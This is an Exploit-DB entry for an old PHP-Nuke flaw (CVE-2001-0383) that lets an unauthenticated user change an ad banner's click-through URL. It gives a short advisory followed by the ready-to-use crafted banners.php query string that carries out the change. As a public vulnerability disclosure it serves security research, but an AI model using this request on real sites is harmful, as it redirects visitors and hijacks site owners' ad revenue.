PHP-Nuke 1.0/2.5/3.0/4.x - Remote Ad Banner URL Change

EDB-ID:

20729

CVE:

2001-0383

EDB Verified:

Author:

Juan Diego

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2001-04-02

Vulnerable App: 
source: https://www.securityfocus.com/bid/2544/info

PHP-Nuke is a website creation/maintainence tool written in PHP3.

A PHP-Nuke feature supporting cycling ad banners is subject to interference from a remote user.

A querystring can be submitted to an unpatched server which allows the remote user to specify a new destination URL to be opened in a visitor's browser upon clicking a PHP-nuke site's ad banner.

By changing the click-through destination of a banner ad, an attacker could interfere with the target's ad-based revenue generation.

To change the url of the first banner you should enter in your browser

http://target/banners.php?op=Change&bid=bannerid&url=http://where.to

if we want to change the banner number 1 to redir to

www.you_are_redir

we write

http://www.example.com/banners.php?op=Change&bid=1&url=http://you.are.redir

(where www.example.com is the server running php-nuke)
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services